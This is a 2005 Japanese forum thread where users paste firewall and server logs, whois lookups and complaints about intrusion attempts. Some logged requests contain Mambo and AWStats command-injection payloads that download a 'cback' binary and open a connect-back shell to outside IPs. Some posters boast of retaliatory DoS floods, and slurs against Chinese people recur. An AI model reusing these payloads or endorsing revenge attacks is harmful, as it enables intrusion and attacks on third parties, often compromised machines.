2005/12/11(14:57:02) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /blog/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:03) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /community/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:04) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /blogs/xmlrpc.php HTTP/1.1" ( dummy )
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　(中略)
2005/12/11(14:57:11) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /pavon/xmlrpc.php HTTP/1.1" ( dummy )

中国何回攻撃してくるんだ
inetnum: 218.64.0.0 - 218.65.127.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
changed: [email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
status: ALLOCATED NON-PORTABLE
source: APNIC

inetnum: 218.64.0.0 - 218.95.255.255
netname: CHINANET-CN
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: CH93-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET
changed: [email protected] 20010628
status: ALLOCATED PORTABLE
source: APNIC

氏ね
inetnum: 218.87.0.0 - 218.87.255.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
source: APNIC

inetnum: 211.90.0.0 - 211.97.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: UCH1-AP
tech-c: UCH1-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CN-CNNIC-UNICOM
status: ALLOCATED PORTABLE
changed: [email protected] 20041203
source: APNIC

inetnum: 211.94.0.0 - 211.103.255.255
netname: CNNIC
descr: China Internet Network Information Center
country: CN
admin-c: HQ1-CN
tech-c: MW1-AP
tech-c: WZ2-AP
remarks: confederation CNNIC
mnt-by: MAINT-CNNIC-AP
changed: [email protected] 19991214
status: ALLOCATED PORTABLE
source: APNIC

22102 へのアクセスがﾊｹﾞｼｽ

中国だから警察にいっても捕まらないんだよな

22時40分に　218.87.160.151（まあ支那だけど･･･）　からの攻撃をブロックしたって表示が出てるんだけど、
ブロックされれば安全ってこと？

IPアドレス 211.155.224.254
ホスト名 mail2.srt.com.cn
IPアドレス
　割当国　※ 中国 (CN)

昨日から攻撃すごいんですけど
どうにかなりませんか？

221.138.69.58から来るんだけど・・・。
一応韓国で住所までわかるんだが・・・。

夜に中国からの攻撃が20回ほどあったんだがなんでいままであんまり攻撃してこなかったのに急にたくさん
攻撃してくるんだろ

昨日の夜に1026使ってインドネシアから攻撃が来たな
珍しい？

133.205.161.195
ホスト名 FLH1Aan195.chb.mesh.ad.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 光

さっきから何度も何度も連続で攻撃してきやがって。うぜぇ氏ね

>>229
ブロックしてないのにブロックしたよって言っていなければ安全

>>233
俺はベトナムからきたぞ

不正アクセスされるとどうなるの

ウゼー
www.mutoh.co.jp


武藤工業って会社が中国の中継
仕事の調べモノできねーじゃん

2005/12/13(02:42:47) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(02:42:49) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(02:42:50) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(02:42:51) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(02:42:52) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(02:42:54) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /drupal/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(02:42:55) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(02:42:56) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /wordpress/xmlrpc.php HTTP/1.1" ( dummy )

途中で改行してあるがこれはひどい。

>>209
1025ポートはApplication Layer Gateway Serviceだと思うんだけど、
過去にセキュリティホールなんてあったっけ？
ファイルバージョン:5.1.2600.2180

ttp://www.mcafee.com/japan/security/virN2003.asp?v=Naldem
こんなのしかヒットしないんだな
感染マシンでも探しているんだろうけどな

2005/12/13(15:09:34) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod
%20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(15:09:36) W-SV ftp1.nickonline.com(166.77.41.116) [80] 302 29 "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod
%20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(15:09:37) W-SV ftp1.nickonline.com(166.77.41.116) [80] 302 29 "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod
%20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy )

2005/12/13(15:09:38) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:39) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blog/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:40) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:41) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:43) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /drupal/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:44) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:45) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /wordpress/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:46) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:47) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:48) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )

httpサーバーからセットでアクセスされているおまえ
ウザいから書き込むな！

あなたが検索されたアドレス［ 221.188.211.53 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 221.188.0.0/16
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
[割当年月日] 2003/08/27
[最終更新] 2003/08/27 12:52:01(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 221.184.0.0/13

昨日は中国からアクセスすごかったのに今日はなんで少なくなったんだ

さっきルータ繋ぎなおしてあるＩＰになったとたん、複数の色んなとこから
ポート
61880
17020
にどーーーーーーーーーーーーーーーーーーーーーっと
いっせいにアクセスされたんだけどこれって何ナノ？(；・∀・)

>>244
WinでBJD使ってる素人だから無理だろ

>>245
みたいな結果って
ＯＣＮのプロバイダ利用している動的ＩＰのＰＣからって事ですか？

俺ゃ、ファイアーウォールの不正アクセスログなど一切気にしません。
ふざけたやつを見つけた時だけ一時間はDOS攻撃をしてやります。

61.14.156.68
とにかくシツコイが罠を仕掛けるとぱったりｗ

61.14.156.70
またきたｗｗｗｗなにこれｗｗｗｗ

% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 61.14.128.0 - 61.14.191.255
netname: ANC-NETBLK04
descr: Asia Netcom Corporation
descr: Internet Service Provider
country: AP
admin-c: AN155-AP
tech-c: AN155-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-AP-ANC

e-mail: [email protected]
-------------------------------------------------------------------------------
訳ワカラン

61.14.156.69
ここヤバイの？？？

220.248.201.2
219.154.96.7
中国（ＣＮ）
ポート1025を攻めてきやがった。

別件で135攻められてるのってブラスタ？

220.148.188.60

掲示板へSPAM書き込み連打。
ぐぐるとわかるけど他の掲示板も被害にあってるっぽい。
どうでもいいけど、SMTPとPOP3が開いてますよ＾＾

すごいのきた。こっちは開いてるように見せかけてるサーバだから大丈夫だけどね。
sshd:
Authentication Failures:
unknown (jinzai.yqa.co.jp): 2928 Time(s)
bin (jinzai.yqa.co.jp): 1 Time(s)
Invalid Users:
Unknown Account: 2928 Time(s)

>>257
これ、PROXで運営されている（おそらく専用）サーバなんだが、
PROXのは管理がいい加減なサーバが多いね。
rootもらってるはずだから利用者側にも問題あるし、
そもそも穴だらけと思われるデフォルト設定をしているPROXもどうかと。
以下、一部抜粋。

$ dig jinzai.yqa.co.jp
;; ANSWER SECTION:
jinzai.yqa.co.jp. 85543 IN A 210.143.109.198


$ dig -x 210.143.109.198
;; ANSWER SECTION:
198.109.143.210.in-addr.arpa. 85955 IN PTR jinzai.yqa.co.jp.

;; AUTHORITY SECTION:
109.143.210.in-addr.arpa. 70772 IN NS dns1.ixent.ne.jp.
109.143.210.in-addr.arpa. 70772 IN NS dns2.ixent.ne.jp.

穴だらけならば落っこどしてやればいいじゃない

攻撃？
そんなのウンコだ

206.223.151.67

81.21.214.70.117
トルコから

さっきはシナチクだった

[09:29:50] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:51] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:52] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:53] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:54] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:55] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:56] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:57] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -

ようやく我が家にもそれらしきものが来たかと思ったが台湾だった…。

厨のＩＰ
220.220.235.175　61.199.8.217

nthygo086018.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.212.18)

[19:16:21] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:22] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:24] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:27] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:28] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:30] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:31] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:32] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:33] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:37] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:38] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:39] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:40] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -

珍しいお客さんだな
オーストラリアか

誰かお力ある方助けてください!うちのHPやリンク先にまでそいつに荒らされたのでご協力ください。
　221.188．193.160
　p6160-ipad03takkise.saga.ocn.ne.jp
よろしくお願いします!!

[19:30:19] <61.1.156.88> (0,0) [異常なヘッダーを受信しました] - -

インド

ntfksm049078.fksm.nt.adsl.ppp.infoweb.ne.jp=222.159.90.78

www.gooddrv.pe.kr
211.184.241.251

CHAINANET-CN
219.146.161.10

おい！チャンコロ！！いい加減にせいよ！
一日中チャンコロだらけだ！

218.18.38.35
213.201.218.211
xydranet.de=85.214.28.58

221.117.59.156
AU

中国からここ毎日攻撃されます。おかしいんじゃないか？ってくらいもの凄いしつこいです。
最近じゃIP追跡しても判定不能って結果返ってきますが皆さんはどうですか？

今日の6:19頃、いろんなとこからsmtpポートへのアタックがあったんですがうちだけですかね?
全部、helo=<WindowsServer2003WebEdition> になってる。

CNからTCP PORT 21857禿げしくうぜー

>>274
ほんとしつこい、帯域食われてまともにHPすら見れなくなる
しばらくモデムの電源OFFすれば消えるけど、めんどくさい

シナ畜221.38.148.30

202.201.229.21
221.237.160.164
151.11.45.70
219-80-229-125.static.tfn.net.tw=219.80.229.125

202.229.166.4

このごろよく出会い系っぽいところから頻繁にメールが届くのですが
これは不正アクセスでメールアドレス盗まれたのでしょうか？

info@のメールがすごい毎時間ごとにきますｗ、記載されているHPみにいっても
同じやつがつくってるっぽいのです、こんなメールです。

お金に余裕のある女性メンバー中心で運営している
当サイトでは只今新しい逆○イベントを開催しております！
★あなたは上村　希絵(社長)【ID:142588】と愛人契約（最低保証金有り〜）を結びませんか？OKであれば登録際に
名前の後に上村(社長)のID:【142588】をつけたください！
http://www.chabby-funk.com/?share


他の金持ち女性からも逆指名を受けるチャンスがあります。
12月25日 16時を過ぎると破棄とみなします。
サイト料金は一切なし！安心してご利用ください。
http://www.chabby-funk.com/?share

拒否:
[email protected]
拒否しても新しいサイトからinfo@でメールが届きます、どうすれば
救われるでしょうか。

拒否なんてしたら藻前んとこにスパムが届いてるって、わざわざ教えにいってる様なもんだよw

>>276
ポート開けとくからだよ。
（refuseするように）閉めておけば、同じところからは１回しかこない。

>> 280

” Spam Mail Killer ”っつうソフトを導入して、"info@"を総蹴りにしてみそ。

61.234.250.25
中国から。氏ね。

205.209.143.90

ｱﾒｰｳｨｶから

このコンピュータに対する侵入 「MS MSDTC UserAllocate BO」 の試みを
検出して遮断しました。


61.234.250.25 =218.22.154.131
さっきからシツコイ　氏ね

>>282
それどうやってやるの？やり方わからん。

IPアドレス 203.141.42.10
ホスト名 imgg01.img.vip.bbt.yahoo.co.jp
IPアドレス割当国　※ 日本 (JP)

TCP SYN FLOOD

lb.acconnect.com(199.234.90.39)
xd182.internetdsl.tpnet.pl(80.55.211.182)
80.50.64.94
86.120.221.177
85-10-201-228.clients.your-server.de(85.10.201.228)

６回
IPアドレス 88.72.32.183
ホスト名 dslb-088-072-032-183.pools.arcor-ip.net
IPアドレス割当国　※ ドイツ (DE)
５回
IPアドレス 61.129.32.87
ホスト名 対応するホスト名がありません
IPアドレス割当国　※ 中国 (CN)
５回
IPアドレス 219.139.32.243
ホスト名 対応するホスト名がありません
IPアドレス割当国　※ 中国 (CN)
４回
IPアドレス 203.179.17.151
ホスト名 www.jbook.co.jp
IPアドレス割当国　※ 日本 (JP)

まとめて氏ね

218.16.120.253中国 (CN)
221.214.140.165中国 (CN)
219.144.234.38中国 (CN)

支那竹は踏み台にされまくりか？
国単位でセキュリティ強化するまでwwwから切り離せよ
あんな国

>>291
外国からの情報を規制するのに手一杯でセキュリティ強化までする余裕がありません（＞＜）
Yahoo!やgoogleや各ISPに圧力をかけるだけで精一杯です。
中国がネット上で迷惑をかけている情報も遮断しているので、各ユーザーが気を付ける事もありませんのであしからず。

要するに自国の利便性”のみ”を追求してる以上それに応じた対応しかしないということやね。

中国はwwwから切り離せ

欧州からのお客さん

217.8.138.29　ノルウェー
195.28.196.79　フランス

不正アクセスのほとんどはアジアからなんだが珍しいな

>>287
Windowsパソコン？
ファイアウォールで必要なポートのみ開けるのがまず第一歩だけど、
ハードウェアのルータを導入するのが簡単。
Windows自体がパーソナルファイアウォール機能ってのも持ってるようだけど、
どの程度のことができるのかはよく知らんので、調べてみそ。
サーバーとか立ててる場合には、さらにサーバー上での設定をいろいろ行う。

今日は中国から来ないよ。珍しい・・。
昨日まではPC起動したらすぐ攻撃してきたのにさ。皆はどうよ。

>>296
winでルータ入れてて、フィルタリングもしてるけど
もしかして、設定間違えてるかも・・・
早々見直してみます、ありがとです。

>>298
IPマスカレード（最近だとNAPTっていう方が多いかな）なら、
大抵はそのまんまでシャットアウトできると思うんだけど、
もしかしたらルータによってはデフォルト設定などが不十分なこともあるかな？
あと、ゲームとかで穴を開けてるなら、その開け方にも注意が必要よん。

nthygo091098.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.227.98)
pcp06964878pcs.nftmyr01.fl.comcast.net(69.139.59.204)
www.teupen-lift.com(195.35.109.65)
137.118.28.226

61.66.208.20

台湾

221.8.166.138

中国

h81172135100.kund.kommunicera.umea.se(81.172.135.100)

あなたが検索されたアドレス［ 211.14.234.152 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.14.232.0/21
b. [ネットワーク名] KATCH-NET
f. [組織名] 株式会社キャッチネットワーク
g. [Organization] KATCH Network Inc.
m. [管理者連絡窓口] NK2872JP
n. [技術連絡担当者] NK2872JP
n. [技術連絡担当者] MO6056JP
p. [ネームサーバ] ns.katch.ne.jp
p. [ネームサーバ] ns2.katch.ne.jp
[割当年月日] 2005/05/09
[最終更新] 2005/05/09 22:53:08(JST)

上位情報
----------
株式会社キャッチネットワーク (KATCH Network Inc.)
[割り振り] 211.14.232.0/21

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.136.219.0/24
b. [ネットワーク名] BIGLOBE-7M
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2003/07/24
[返却年月日]
[最終更新] 2004/04/12 17:47:01(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 203.136.128.0/17
しつこい。。

IPアドレス 220.150.150.49
日本時間0時32分
連続26回のアクセス

inetnum: 220.150.0.0 - 220.150.255.255
netname: FBDC
descr: FreeBit Co.,Ltd.
descr: 13F E.Space Tower 3-6 Maruyama-cho,
descr: Shibuya-ku,Tokyo,Japan
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
status: ALLOCATED PORTABLE
remarks: Email address for spam or abuse complaints : [email protected]
mnt-by: MAINT-JPNIC
mnt-lower: MAINT-JPNIC
changed: [email protected] 20040122
source: APNIC

>>306
俺なんて不正アクセスに腹が立ったら1万回はパケット送信してやるがなw

>>308
昔は俺もそんなことやってたなｗ

220.133.92.35　台湾
218.42.119.137　日本
194.199.43.59　フランス
68.236.161.197　？？？

鬱陶しいにゃー

IPアドレス 220.150.150.49
ブロック時間　日本時間23時20分
この人昨日も凄かったけど今日も30回ほどアクセスあり
どこの誰？何も情報もってませんよ〜

IP219.112.79.229
Node229.79.112.219.ap.yourne

ノートン先生で追っかけたけど、サーバが応答しなかった
どこだよこいつ

>>312
229.79.112.219.ap.yournet.ne.jp
yournet.ne.jpってのは多くのISPに接続ポイントのインフラを提供している会社のひとつ。
だから一般人の感染したパソコンでしょ。

>>313
そうだったのか、とんｋぅす

218.219.144.126

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.219.144.0/24
b. [ネットワーク名] EDITNET

うざす
f. [組織名] EditNet 株式会社
g. [Organization] EditNet, Inc.
m. [管理者連絡窓口] JP00000379
n. [技術連絡担当者] JP00000379
p. [ネームサーバ] korosuke.edit.ne.jp
p. [ネームサーバ] ns.edit.ne.jp
p. [ネームサーバ] ns1.edit.ne.jp
p. [ネームサーバ] ns2.edit.ne.jp
[割当年月日] 2002/01/25
[返却年月日]
[最終更新] 2005/06/20 23:49:12(JST)

195.178.133.101
ウクライナ(ﾟωﾟ=)

25番ポートに複数の国から来ているけど、何の祭りだ？

219.141.46.39から1200〜1400あたりを延々とポートスキャン

person: dan lu
nic-hdl: DL72-AP
e-mail: [email protected]
address: 3. east yanan road of guiyang
address: 550001 china
phone: +86-851-6861469
fax-no: +86-851-6857020
country: CN
changed: [email protected] 20030122
mnt-by: MAINT-CHINANET-GUIZHOU
source: APNIC

194.232.80.53 25番ポートを１時間に３回程度ポートスキャンしている。
wkwihimi.hernstein.at
http://wkwihimi.hernstein.at/

221.246.54.247 http://www.oks-net.co.jp/

多分こいつに食われて繁殖活動中
http://www.mcafee.com/japan/security/virL.asp?v=Linux/Lupper.worm

>>320
同じとこからさっきｷﾀｗ

210.158.41.21 (speakeasy2.speakeasy.co.jp) から100回以上のSSHアタック。
この会社のメインのウェブサーバー www.speakeasy.co.jp は繋がらないみたいだから、
クラックされて落ちてるか、クラックに気づいて切り離していると思われ。

気付いて切り離して放置してたら悪質だな（；′д｀）

www.speakeasy.co.jp て常連さんだよw

219.240.39.130
81.82.221.38
203.162.6.66
207.161.40.164

Uzeeeeeeeeeeeeeeeeeeeeeeeeeeeee!!

>>324
そうなんだ...でもgoogle掛からないね。それっぽい話。

世界平和とは対抗しないこと。
ネットワークではファイアウォールがあるから攻撃されるのです。
防衛は戦争なのです。


大津市のように　『無防備宣言』　をすべきです。
すべてのポートを開いて誰でも自由にアクセスできるようにする。
この心掛けが重要なのです。


これが世界平和へと通じるのです。

さあ、
みなさんもファイアウォールを無効にして
ルーターも取り払いましょう。
世界平和のために。

Microsoft Updateやapt-getもやめましょう

61.116.196.143

アメリカはキャリフォルニアからいらっしゃーい

まあ、お茶でも飲もうよ？

BD NetBus Pro2.0って何よ？

>>330
TCP12345-12346突いてくるトロイの木馬だよ

うおっ、すげー勉強しちゃったぜ。

糞が進入してきたら
ゴミのＩＰを基地外シナ反日サイトに晒しちゃってるけど
問題ないよね

61.14.184.242
すごい勢いでログが埋まってる

なんかsshアタックはなれたなｗ
去年の夏から急増して、今じゃ年中行事。一応国内の奴だけはISPに
警告のメールを送っておくけどね。某社なんぞ反応全くなし。自分とこ
のユーザーが犯罪してるんだけどな・・・。

先週は中国から猛烈に攻撃されたがここ最近はパッタリと止んだ。
あーすっきり。

>>335
慣れるというか、対策をちゃんとやってれば心配には及ばないけど、
企業なんかは電話するか、レンサバ運用ならそっちに連絡した方が「いとおかし」だよ。
企業の対応が興味深いし、中堅以上のサーバー会社なら間違いなくサーバーを止める。
企業はそこから慌てふためく。

209.219.89.130
68.90.168.82

疑わしきは罰する（晒す）

>>9
ワロタ

時が・・・止まった・・・

あなたが検索されたアドレス［ 61.204.189.39 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.204.188.0/22
b. [ネットワーク名] POINT-EA
f. [組織名] 株式会社ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET,Inc.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MK10931JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2002/11/22
[最終更新] 2005/09/12 14:50:03(JST)

上位情報
----------
株式会社パワードコム (POWEREDCOM, Incorporated)
[割り振り] 61.204.128.0/17

こんどからさぁ、信頼ゾーンに入れておくからさぁ、
おじさんにロリコン物をわけてくれよぅ。

送信元はバラバラなんだけど3時間で８３３３ポートを２０００回以上ノックされたｗ

送信元、一部抜粋

217-159-252-96-dsl.prn.estpak.ee
c-24-6-44-87.hsd1.ca.comcast.net
S01060040052da136.cg.shawcable.net(68.147.57.68)
203.84.69.5.in-addr.arpa.rivernet.com.au
MYCHAT-E8BA33A8(140.113.185.63)
220-129-148-214.dynamic.hinet.net
61-70-221-181.adsl.static.giga.net.tw
24-117-68-77.cpe.cableone.net
modemcable071.107-37-24.mc.videotron.ca
ip215-128-211-87.adsl2.versatel.nl
218-34-77-245.cm.dynamic.apol.com.tw

83.16.85.11
217.170.24.234

はい2丁追加ー！

不正アクセスだけじゃなくて
ネットワークウイルスで攻撃してくるやつが２０人くらいいるんだけど・・・
一応調べたら日本でみんなucom
これってどういうことなんですか？

ここんとこ、ブログシステムの脆弱性狙いと思われる何種類かのHTTPアクセスが毎日のようにある。
ダミーホストで落としてるから問題は無いんだけど。

>>337
一応ＳＳＨのくライアント認証入れてるからあのスクリプトなら安全という認識です。
正直対応するのきりがない・・・。まぁ国内だけは対応するつもりですけどね。

あなたが検索されたアドレス［ 61.210.109.25 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.210.0.0/16
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2001/05/24
[最終更新] 2003/11/06 11:10:23(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.210.0.0/16

ぼくちんはトロイに感染してないからアタックしても無駄なんだな

24.222.219.188
212.238.220.136
212.41.243.217
218.249.36.88

多いなー
何が楽しいんだろ

210.254.84.178

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.254.84.0/22
b. [ネットワーク名] SPN-HIKARI
f. [組織名] 東京電力株式会社
g. [Organization] The Tokyo Electric Power Company,Incorporated
m. [管理者連絡窓口] KI6575JP
n. [技術連絡担当者] KI6575JP
p. [ネームサーバ] ns.speednet.ne.jp
p. [ネームサーバ] ns2.point.ne.jp
[割当年月日] 2003/05/28
[最終更新] 2004/12/15 14:11:08(JST)
上位情報
----------
株式会社パワードコム (POWEREDCOM, Incorporated)
[割り振り] 210.254.64.0/18
下位情報

ﾏｼﾞuzeeeeee！

踏み台にされているのか？

210.191.208.201 - - [24/Dec/2005:00:32:11 +0900] "GET /awstats/awstats.pl?configdir=|echo; （略）
210.191.208.201 - - [24/Dec/2005:00:32:12 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo; （略）
210.191.208.201 - - [24/Dec/2005:00:32:13 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo; （略）
210.191.208.201 - - [24/Dec/2005:00:32:15 +0900] "POST /xmlrpc.php HTTP/1.1" 404 279 "-" （略）
210.191.208.201 - - [24/Dec/2005:00:32:16 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 284 "-" （略）
210.191.208.201 - - [24/Dec/2005:00:32:17 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 291 "-" （略）
210.191.208.201 - - [24/Dec/2005:00:32:18 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 292 "-" （略）
210.191.208.201 - - [24/Dec/2005:00:32:20 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 286 "-" （略）
210.191.208.201 - - [24/Dec/2005:00:32:21 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 292 "-" （略）
